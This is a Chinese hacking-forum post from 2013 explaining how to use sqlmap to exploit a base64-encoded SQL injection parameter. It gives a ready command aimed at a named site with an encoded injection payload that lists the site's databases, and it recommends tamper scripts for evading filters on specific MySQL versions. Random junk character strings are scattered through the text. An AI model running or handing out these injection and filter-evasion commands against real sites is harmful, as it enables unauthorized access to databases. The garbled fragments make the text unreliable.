找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2229|回复: 0
打印 上一主题 下一主题

SQlMap Tamper注入Base64编码注入点

[复制链接]
跳转到指定楼层
楼主
发表于 2013-11-23 15:50:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?/ K& h3 n$ U+ P7 x! @

. `. S; {3 [7 q/ e- w, Psqlmap的tamper里有个base64encode.py. L" d3 I3 K5 L- [+ q
/ }9 J7 k, A# B( m
使用如下
. o. V/ S& B, Z. V  d* E* x  ?$ F$ A) [4 O0 j; `, }
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
! N/ R: b! w. m) Z- k, D1 U4 O; Y* L% C3 @, P
3 S: U3 h; t: P# [
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
' r5 Y% I# O' z- H8 \5 n. z; }! ^: |/ m/ L
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
( j& i8 e8 }: W2 d6 O4 G. p
  i7 F1 z$ t5 l% c, C0 I# ]& Kspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入
$ w/ j+ o3 Y5 |- M0 C" j1 Cspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入  K+ t' X+ s+ B% U( _, r
首先确定目标数据库版本,然后选择相应的脚本。
- R: e* \/ L5 w: d1 W' r" d) [-v 3 --batch --tamper "space2hash.py"8 V' G/ B3 B  }7 D
. {5 v2 N- O2 d3 t1 `; H$ W  D3 Q$ z
还有其他一些插件:
1 o& _0 f  o$ F& E2 F. xencodes编码 ——charencode.py
" l4 `, ^+ O- c1 S2 g! t. p) ebase64编码 —— base64encode.py
! `- X9 v1 q- S5 H替换空格和关键字 —— halfversionedmorekeywords.py* U( F+ Z0 O* B+ P
5 L! l1 @! K; J4 `% @; d: B
- h" G4 ~& L2 Y9 h6 @3 R! W) ~

- K- l' ~9 ^! w6 q' m# h! u* ?6 U8 y8 N0 J0 q4 ]4 k
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表